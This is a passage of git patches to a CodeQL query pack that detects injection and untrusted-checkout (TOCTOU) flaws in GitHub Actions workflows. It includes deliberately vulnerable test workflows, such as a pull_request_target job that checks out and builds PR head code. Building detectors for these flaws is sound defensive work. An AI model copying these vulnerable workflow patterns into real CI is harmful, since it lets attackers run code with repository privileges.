key, string value, Step artifact | controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | // foo=$(> "$GITHUB_ENV" - exists(string var_name, string line, string assignment_regexp, string file_read | - run.getScript().splitAt("\n") = line and - assignment_regexp = "([a-zA-Z0-9\\-_]+)=(.*)" and - var_name = line.regexpCapture(assignment_regexp, 1) and - file_read = line.regexpCapture(assignment_regexp, 2) and - outputsPartialFileContent(file_read) and + exists(string var_name, string file_read | + run.getAnAssignment(var_name, file_read) and + Bash::outputsPartialFileContent(run, file_read) and envToRunExpr(var_name, run, value) and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubEnv(key, value) ) or // A file is read and its content is assigned to an output // - run: echo "foo=$(> "$GITHUB_ENV" - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and - outputsPartialFileContent(value) + run.getAWriteToGitHubEnv(key, value) and + Bash::outputsPartialFileContent(run, value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and artifact.getAFollowingStep() = run and diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 923d950631d..a80032de320 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -27,19 +27,19 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { ( // e.g. // cat test-results/.env >> $GITHUB_PATH - fileToGitHubPath(run, _) + Bash::fileToGitHubPath(run, _) or exists(string value | - writeToGitHubPath(run, value) and + run.getAWriteToGitHubPath(value) and ( - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_PATH exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 6f325ca4c93..65c6938f0a4 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -29,22 +29,21 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { ( // e.g. // cat test-results/.env >> $GITHUB_ENV - fileToGitHubEnv(run, _) + Bash::fileToGitHubEnv(run, _) or - exists(string content, string value | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and + exists(string value | + run.getAWriteToGitHubEnv(_, value) and ( // e.g. // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_ENV exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4a488f945b9..8541286f6e1 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -38,27 +38,25 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( // e.g. // cat test-results/.vars >> $GITHUB_OUTPUT - fileToGitHubOutput(run, _) + Bash::fileToGitHubOutput(run, _) or - exists(string content, string key, string value | - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and + exists(string key, string value | + run.getAWriteToGitHubOutput(key, value) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and + exists(string key2 | + run.getAWriteToGitHubOutput(key2, _) and not key2 = key ) and ( - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_OUTPUT exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or @@ -87,9 +85,8 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and + exists(string key2 | + run.getAWriteToGitHubOutput(key2, _) and not key2 = key ) and exists(run.getInScopeEnvVarExpr(var_name)) and @@ -118,7 +115,7 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { WorkflowCommandClobberingFromEnvVarSink() { exists(Run run, string output_line, string clobbering_line, string var_name | run.getScript().splitAt("\n") = output_line and - singleLineWorkflowCmd(output_line, "set-output", _, _) and + Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and run.getScript().splitAt("\n") = clobbering_line and clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and exists(run.getInScopeEnvVarExpr(var_name)) and @@ -132,19 +129,16 @@ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { exists(Run run, string output_line, string clobbering_line | run.getScriptScalar() = this.asExpr() and run.getScript().splitAt("\n") = output_line and - singleLineWorkflowCmd(output_line, "set-output", _, _) and + Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and run.getScript().splitAt("\n") = clobbering_line and ( // A file is read and its content is assigned to an env var that gets printed to stdout // - run: | // foo=$(> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=SUBCOMMAND | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64) | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | base64 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | cat status.output.json | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | dd if=/dev/urandom bs=15 count=1 status=none | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$(cat status.output.json)" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "SUBCOMMAND" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | @@ -132,7 +136,7 @@ | .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | @@ -159,7 +163,7 @@ | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo SUBCOMMAND | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo bar | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | @@ -185,15 +189,11 @@ | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "bar" | | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" | | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | npm i | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo SUBCOMMAND bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | npm i | | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | " config.json | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = .* | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\" | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | awk -f ./config.awk > foo.txt | diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 100eddb1400..a87ec0a341c 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,5 +1,3 @@ -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 80ebd80b4c2..5880e06da7f 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -81,7 +81,7 @@ query predicate writeToGitHubEnv1(string content) { //"FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", ] and //linesFileWrite(t, _, "$GITHUB_ENV", content, _) - blockFileWrite(t, _, "$GITHUB_ENV", content, _) + Bash::blockFileWrite(t, _, "$GITHUB_ENV", content, _) //extractFileWrite(t, "GITHUB_ENV", content) ) } @@ -113,8 +113,8 @@ query predicate writeToGitHubEnv(string key, string value, string content) { "echo VAR15=$(> $GITHUB_ENV", "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", ] and - extractFileWrite(t, "GITHUB_ENV", content) and - extractVariableAndValue(content, key, value) + Bash::extractFileWrite(t, "GITHUB_ENV", content) and + Bash::extractVariableAndValue(content, key, value) ) } @@ -132,8 +132,8 @@ query predicate writeToGitHubOutput(string key, string value, string content) { "echo VAR8=$(> ${GITHUB_OUTPUT}", "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", ] and - extractFileWrite(t, "GITHUB_OUTPUT", content) and - extractVariableAndValue(content, key, value) + Bash::extractFileWrite(t, "GITHUB_OUTPUT", content) and + Bash::extractVariableAndValue(content, key, value) ) } @@ -150,6 +150,6 @@ query predicate isBashParameterExpansion(string parameter, string operator, stri "${parameter21%%pattern}", "${parameter22/pattern/string}", "${parameter23//pattern/string}", ] and - isBashParameterExpansion(test, parameter, operator, params) + Bash::isBashParameterExpansion(test, parameter, operator, params) ) } From 5494f7f09953e8fa7f277528d6ac62db3019b3e0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:16:37 +0200 Subject: [PATCH 0565/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9637b993118..49cb71df1b2 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.62 +version: 0.1.63 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6548292a677..864c4949a12 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.62 +version: 0.1.63 groups: [actions, queries] suites: codeql-suites extractor: javascript From 350b354fb3f9dc179f0c8bed0efb7d527cef5eaa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:17:45 +0200 Subject: [PATCH 0566/1267] remmove leftover comments --- ql/lib/codeql/actions/Helper.qll | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 8391463fd20..688d62acbe1 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -202,10 +202,8 @@ module Bash { "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and content = trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + - // "$(" + - trimQuotes(script.regexpCapture(regexp, 6)) + - // ")\n" + - "\n" + trimQuotes(script.regexpCapture(regexp, 4)) and + trimQuotes(script.regexpCapture(regexp, 6)) + "\n" + + trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" From 0c9b808fdf91d0b06014a2abbaebf0199f836553 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:41:18 +0200 Subject: [PATCH 0567/1267] Make Argument Injection queries experimental --- ql/src/Security/CWE-088/ArgumentInjectionCritical.ql | 1 + ql/src/Security/CWE-088/ArgumentInjectionMedium.ql | 1 + 2 files changed, 2 insertions(+) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 2626de31935..5962132d72e 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -8,6 +8,7 @@ * @id actions/argument-injection/critical * @tags actions * security + * experimental * external/cwe/cwe-088 */ diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql index fa5b750fd89..37acbc05122 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql @@ -8,6 +8,7 @@ * @id actions/argument-injection/medium * @tags actions * security + * experimental * external/cwe/cwe-088 */ From a3cf8766ffe7d42e8ac77cc22ad3e1f6f404a5b3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:42:23 +0200 Subject: [PATCH 0568/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 49cb71df1b2..0be2657c99e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.63 +version: 0.1.64 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 864c4949a12..ebdf6b364b2 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.63 +version: 0.1.64 groups: [actions, queries] suites: codeql-suites extractor: javascript From 860eda9c041162b5031c51b2f8a91c652b4fe11f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 4 Oct 2024 18:04:13 +0200 Subject: [PATCH 0569/1267] Improve control checks to better account for toctou issues --- .../codeql/actions/security/ControlChecks.qll | 64 +++-- .../UntrustedCheckoutTOCTOUCritical.ql | 12 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 11 +- .../CWE-829/UntrustedCheckoutCritical.ql | 18 +- .../{deployment.yml => deployment1.yml} | 0 .../CWE-367/.github/workflows/deployment2.yml | 31 ++ .../CWE-367/.github/workflows/test0.yml | 68 +++++ .../CWE-367/.github/workflows/test1.yml | 96 +++++++ .../CWE-367/.github/workflows/test2.yml | 227 +++++++++++++++ .../CWE-367/.github/workflows/test3.yml | 271 ++++++++++++++++++ .../CWE-367/.github/workflows/test4.yml | 89 ++++++ .../CWE-367/.github/workflows/test5.yml | 209 ++++++++++++++ .../CWE-367/.github/workflows/test6.yml | 253 ++++++++++++++++ .../UntrustedCheckoutTOCTOUCritical.expected | 105 ++++++- .../UntrustedCheckoutTOCTOUHigh.expected | 2 + .../UntrustedCheckoutCritical.expected | 3 - 16 files changed, 1399 insertions(+), 60 deletions(-) rename ql/test/query-tests/Security/CWE-367/.github/workflows/{deployment.yml => deployment1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 801ccb6e986..86de44c3b5c 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -1,30 +1,44 @@ import actions -string any_relevant_category() { +string any_category() { result = [ "untrusted-checkout", "output-clobbering", "envpath-injection", "envvar-injection", "command-injection", "argument-injection", "code-injection", "cache-poisoning", - "untrusted-checkout-toctou", "artifact-poisoning" + "untrusted-checkout-toctou", "artifact-poisoning", "artifact-poisoning-toctou" ] } -string any_non_toctou_category() { - result = any_relevant_category() and not result = "untrusted-checkout-toctou" +string non_toctou_category() { + result = any_category() and not result = "untrusted-checkout-toctou" } -string any_relevant_event() { +string toctou_category() { result = ["untrusted-checkout-toctou", "artifact-poisoning-toctou"] } + +string any_event() { result = actor_not_attacker_event() or result = actor_is_attacker_event() } + +string actor_is_attacker_event() { result = [ + // actor and attacker have to be the same "pull_request_target", - "issue_comment", - "pull_request_comment", "workflow_run", + "discussion_comment", + "discussion", "issues", "fork", - "watch", - "discussion_comment", - "discussion" + "watch" + ] +} + +string actor_not_attacker_event() { + result = + [ + // actor and attacker can be different + // actor may be a collaborator, but the attacker is may be the author of the PR that gets commented + // therefore it may be vulnerable to TOCTOU races where the actor reviews one thing and the attacker changes it + "issue_comment", + "pull_request_comment", ] } @@ -81,7 +95,9 @@ abstract class AssociationCheck extends ControlCheck { // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -90,7 +106,9 @@ abstract class ActorCheck extends ControlCheck { // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -106,8 +124,9 @@ abstract class PermissionCheck extends ControlCheck { // - they are effective against pull requests/workflow_run since they can control who can make changes // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run", "issue_comment"] and - category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -115,7 +134,9 @@ abstract class LabelCheck extends ControlCheck { // checks if the issue/pull_request is labeled, which implies that it could have been approved // - they dont protect against mutation attacks override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -123,14 +144,16 @@ class EnvironmentCheck extends ControlCheck instanceof Environment { // Environment checks are not effective against any mutable attacks // they do actually protect against untrusted code execution (sha) override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } abstract class CommentVsHeadDateCheck extends ControlCheck { override predicate protectsCategoryAndEvent(string category, string event) { // by itself, this check is not effective against any attacks - none() + event = actor_not_attacker_event() and category = toctou_category() } } @@ -187,7 +210,7 @@ class PullRequestTargetRepositoryIfCheck extends RepositoryCheck instanceof If { } override predicate protectsCategoryAndEvent(string category, string event) { - event = "pull_request_target" and category = any_relevant_category() + event = "pull_request_target" and category = any_category() } } @@ -205,7 +228,7 @@ class WorkflowRunRepositoryIfCheck extends RepositoryCheck instanceof If { } override predicate protectsCategoryAndEvent(string category, string event) { - event = "workflow_run" and category = any_relevant_category() + event = "workflow_run" and category = any_category() } } @@ -250,6 +273,9 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { not exists(this.getArgument("permission-level")) or this.getArgument("permission-level") = ["write", "admin"] ) + or + this.getCallee() = "actions/github-script" and + this.getArgument("script").splitAt("\n").matches("%getCollaboratorPermissionLevel%") } } diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 11897c464bf..16fb2606af7 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -18,18 +18,14 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from - LocalJob job, MutableRefCheckoutStep checkout, PoisonableStep step, ControlCheck check, - Event event +from MutableRefCheckoutStep checkout, PoisonableStep step, Event event where - job.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, event, "untrusted-checkout") and - not check.protects(checkout, event, "untrusted-checkout-toctou") + exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select step, checkout, step, - "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", - check, check.toString() + "Insufficient protection against execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 5956b52ccbe..d4ed49e497a 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,17 +16,14 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob job, MutableRefCheckoutStep checkout, ControlCheck check, Event event +from MutableRefCheckoutStep checkout, Event event where - job.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and - event = job.getATriggerEvent() and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, event, "untrusted-checkout") and - not check.protects(checkout, event, "untrusted-checkout-toctou") + exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select checkout, - "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", - check, check.toString() + "Insufficient protection against execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index f9f95191795..37628a29489 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -26,22 +26,6 @@ where checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(step, event) and - ( - // issue_comment: check for date comparison checks and actor/access control checks - event.getName() = "issue_comment" and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(step) and - date_check.dominates(step) - ) - or - // not issue_comment triggered workflows - not event.getName() = "issue_comment" and - not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) - ) + not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml rename to ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml new file mode 100644 index 00000000000..5c6e28eafc8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml @@ -0,0 +1,31 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml +name: Environment PR Check + +on: + pull_request_target: + branches: + - main + paths: + - 'README.md' + workflow_dispatch: +jobs: + test: + environment: Public CI + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + + - name: Set Node.js 20.x for GitHub Action + uses: actions/setup-node@v4 + with: + node-version: 20.x + + - name: installing node_modules + run: cd deployment_example && npm install + + - name: Build GitHub Action + run: cd deployment_example && npm run build diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml new file mode 100644 index 00000000000..a4acd738766 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml @@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + 